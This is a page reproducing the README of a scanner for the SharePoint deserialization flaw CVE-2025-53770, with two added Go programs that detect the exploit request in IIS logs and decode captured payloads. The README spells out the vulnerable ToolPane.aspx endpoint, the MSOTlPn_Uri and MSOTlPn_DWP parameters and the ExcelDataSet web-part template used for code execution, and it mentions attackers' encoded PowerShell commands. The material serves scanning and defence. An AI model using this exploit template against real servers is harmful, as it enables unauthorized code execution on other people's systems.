Associated Vulnerability
Title: Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2025-53770)
Description: Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.
Description
Scanner for the SharePoint CVE-2025-53770 RCE zero-day vulnerability.
Readme
# CVE-2025-53770
This is a scanner for [the SharePoint unauthenticated Remote Code Execution vulnerability](https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/), assigned CVE number CVE-2025-53770.
The code for this was written by reverse-engineering a payload seen in [the wild](https://raw.githubusercontent.com/kaizensecurity/CVE-2025-53770/refs/heads/master/payload).
Use at your own risk; I am not responsible for any negative impact this might cause.
## How does it work?
It tries to exploit the vulnerability by injecting [a marker](pkg/payload/test_payload.go) in the SharePoint ToolBox widget.
If this harmless marker is found in the SharePoint server response, the host is marked as vulnerable.
## How to use
```zsh
# check whether <TARGET-HOSTNAME> is vulnerable and try to extract version information
% ./CVE-2025-53770 [<TARGET-HOSTNAME> ...]
INFO[0000] set log level fields.level=info
INFO[0000] starting scanner targets=1
INFO[0001] detected SharePoint version target=<REDACTED> version="MicrosoftSharePointTeamServices: 16.0.0.5469\n"
WARN[0001] target is vulnerable target=<REDACTED>
# turn on debug logging and try retrieving SharePoint version information
% ./CVE-2025-53770 -log=debug -version <TARGET-HOSTNAME>
...
```
## Who is vulnerable?
Anyone running the *on-prem* version of SharePoint Server without KB5002768 and KB5002754 installed.
## How does this vulnerability work?
The vulnerability presumably builds upon a previously disclosed SharePoint vulnerability, CVE-2025-49706.
By sending an HTTP POST request to `https://<TARGET>/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx` with a gzip-compressed, base64-encoded payload, you can achieve Remote Code Execution as the SharePoint runtime process.
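As an added defensive example, not part of the scanner's own code: the Go program below scans IIS W3C log lines for the POST to `/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx` described above. The log lines and their field order are constructed for the demo; adjust the field indexes to match your server's `#Fields:` line.

```go
package main

import (
	"fmt"
	"strings"
)

// Hit is one log line matching the ToolPane.aspx request pattern described above.
type Hit struct {
	Line                  int
	ClientIP, URI, Status string
}

// ToolPaneHits scans W3C-format IIS log lines with the field order used by the
// constructed sample below (date time s-ip cs-method cs-uri-stem cs-uri-query
// s-port cs-username c-ip sc-status) and returns every POST to
// /_layouts/15/ToolPane.aspx whose query has DisplayMode=Edit and a=/ToolPane.aspx.
func ToolPaneHits(logText string) []Hit {
	var hits []Hit
	for i, line := range strings.Split(logText, "\n") {
		f := strings.Fields(line)
		if len(f) < 10 || strings.HasPrefix(f[0], "#") {
			continue // blank, truncated or W3C directive line
		}
		stem, query := strings.ToLower(f[4]), strings.ToLower(f[5])
		if !strings.EqualFold(f[3], "POST") ||
			!strings.HasSuffix(stem, "/_layouts/15/toolpane.aspx") ||
			!strings.Contains(query, "displaymode=edit") ||
			!strings.Contains(query, "a=/toolpane.aspx") {
			continue
		}
		hits = append(hits, Hit{Line: i + 1, ClientIP: f[8], URI: f[4] + "?" + f[5], Status: f[9]})
	}
	return hits
}

// SampleLog is a constructed IIS log excerpt, not real traffic.
const SampleLog = `#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2025-07-21 14:04:52 10.0.0.5 GET /_layouts/15/start.aspx - 443 DOMAIN\alice 10.0.0.20 200
2025-07-21 14:04:53 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.7 200
2025-07-21 14:04:54 10.0.0.5 GET /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 DOMAIN\bob 10.0.0.21 200
2025-07-21 14:05:01 10.0.0.5 POST /_layouts/15/toolpane.aspx displaymode=edit&a=/toolpane.aspx 443 - 198.51.100.9 500`

func main() {
	for _, h := range ToolPaneHits(SampleLog) {
		fmt.Printf("line %d: POST %s from %s -> HTTP %s\n", h.Line, h.URI, h.ClientIP, h.Status)
	}
}
```

Legitimate web part editing by signed-in users can reach ToolPane.aspx too, so prioritise hits whose `cs-username` is `-` (unauthenticated) and that come from unexpected source addresses.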
Two form parameters are important here:
1. `MSOTlPn_Uri`: control source path.
   This pretends to reference a legitimate SharePoint control (AclEditor.ascx) and tricks SharePoint into allowing the web part edit.
   It seems to be a mock value that only has to pass validation.
   The original malicious payload includes `MSOTlPn_Uri=https://<TARGET>%s/_controltemplates/15/AclEditor.ascx`, but this does not seem to be used at this point.
2. `MSOTlPn_DWP`: web part configuration.
   This parameter injects custom ASP.NET directives (`<%@ Register %>`) and server-side markup (`<Scorecard:ExcelDataSet>`).
   Its `CompressedDataTable` attribute holds attacker-controlled serialized data (gzip + base64), which triggers the RCE.
The payload has the following structure:
```xml
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
<ProgressTemplate>
<div class="divWaiting">
<Scorecard:ExcelDataSet CompressedDataTable="<PAYLOAD-GZIPPED-BASE64-ENCODED>" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
</div>
</ProgressTemplate>
</asp:UpdateProgress>
```
If a control like `Scorecard:ExcelDataSet` exists and its `CompressedDataTable` property is set, it's deserialized directly by the SharePoint DWP Parser.
The payload itself can be rather interesting, as it can contain a `System.DelegateSerializationHolder` which triggers a deserialization RCE.
Threat actors abused this to pass `/c powershell -EncodedCommand <POWERSHELL-PAYLOAD>` in their payload to achieve code execution.
In our case, we merely pass a static placeholder to prove exploitability:
```xml
<diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
<foo>
<bar diffgr:id="Table" msdata:rowOrder="0" diffgr:hasChanges="inserted">
<poc xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<TestWrapper>
<Info>This is a harmless CVE-2025-53770 PoC marker.</Info>
<Timestamp>2025-07-21T14:04:52Z</Timestamp>
</TestWrapper>
</poc>
</bar>
</foo>
</diffgr:diffgram>
```
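As an added analyst-side example, not part of the scanner's code: the Go program below decodes a captured `CompressedDataTable` value in the base64(gzip(xml)) form described above, caps the inflated size, and flags the `System.DelegateSerializationHolder` type name named in the section. The sample input is the README's harmless marker text, constructed here in the same encoding; `Encode` exists only to build that sample.

```go
package main

import (
	"bytes"
	"compress/gzip"
	"encoding/base64"
	"fmt"
	"io"
	"strings"
)

// DecodeCompressedDataTable reverses the base64 + gzip encoding described above
// so an analyst can read the embedded XML without ever deserializing it.
func DecodeCompressedDataTable(b64 string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(strings.TrimSpace(b64))
	if err != nil {
		return "", fmt.Errorf("base64: %w", err)
	}
	zr, err := gzip.NewReader(bytes.NewReader(raw))
	if err != nil {
		return "", fmt.Errorf("gzip: %w", err)
	}
	defer zr.Close()
	// Cap the inflated size: a captured blob may be a decompression bomb.
	out, err := io.ReadAll(io.LimitReader(zr, 4<<20))
	if err != nil {
		return "", fmt.Errorf("inflate: %w", err)
	}
	return string(out), nil
}

// IsSuspicious flags the type name the README associates with the RCE gadget.
func IsSuspicious(xml string) bool {
	return strings.Contains(xml, "System.DelegateSerializationHolder")
}

// Encode builds a constructed sample in the same base64(gzip(xml)) form for the demo.
func Encode(xml string) string {
	var buf bytes.Buffer
	zw := gzip.NewWriter(&buf)
	_, _ = zw.Write([]byte(xml))
	_ = zw.Close()
	return base64.StdEncoding.EncodeToString(buf.Bytes())
}

func main() {
	// Constructed input: the README's harmless marker text, encoded as the scanner would send it.
	sample := Encode(`<poc><Info>This is a harmless CVE-2025-53770 PoC marker.</Info></poc>`)
	xml, err := DecodeCompressedDataTable(sample)
	fmt.Printf("err=%v suspicious=%v\n%s\n", err, IsSuspicious(xml), xml)
}
```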
File Snapshot
```text
[4.0K] /data/pocs/49715adffd94f2b96e5fe2cd2856b471148a8c37
├── [4.0K] cmd
│   └── [2.7K] main.go
├── [ 848] Dockerfile
├── [ 169] go.mod
├── [1.6K] go.sum
├── [  48] Makefile
├── [4.0K] pkg
│   └── [4.0K] payload
│       ├── [2.4K] extract.go
│       ├── [3.5K] payload.go
│       ├── [1.7K] test.go
│       └── [ 685] test_payload.go
└── [4.4K] README.md
3 directories, 10 files
```